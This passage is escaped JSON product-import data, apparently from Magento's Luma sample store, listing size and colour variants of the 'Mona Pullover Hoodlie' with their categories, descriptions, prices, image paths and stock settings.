e\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XS-Orange\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xs-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Orange\"},\"984\":{\"sku\":\"WH01-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-XS-Purple\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"},\"985\":{\"sku\":\"WH01-S-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-S-Green\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"986\":{\"sku\":\"WH01-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-S-Orange\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"987\":{\"sku\":\"WH01-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-S-Purple\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"988\":{\"sku\":\"WH01-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-M-Green\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"image\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/h\\/wh01-green_alt1.jpg,\\/w\\/h\\/wh01-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"989\":{\"sku\":\"WH01-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-M-Orange\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"990\":{\"sku\":\"WH01-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-M-Purple\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"57\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"mona-pullover-hoodlie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/h\\/wh01-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"991\":{\"sku\":\"WH01-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Hoodies & Sweatshirts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Mona Pullover Hoodlie-L-Green\",\"description\":\"Whether you\'re after energizing activity or eye-catching apparel, the Mona Pullover is what you want. You\'ll stay warm and look fashionable, wherever you are.<br \\/> <br \\/> &bull; Light green heathered hoodie. <br \\/> &bull; Long-Sleeve, pullover.<br \\/> &bull; Long elliptical hem for extra coverage.<br \\/> &bull; Deep button placket for layering.<br \\/> &bull; Double rib design.<br \\/> &bull; Mid layer, mid weight.<br \\/> &bull; 98% Merino Wool \\/ 2% Spandex\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 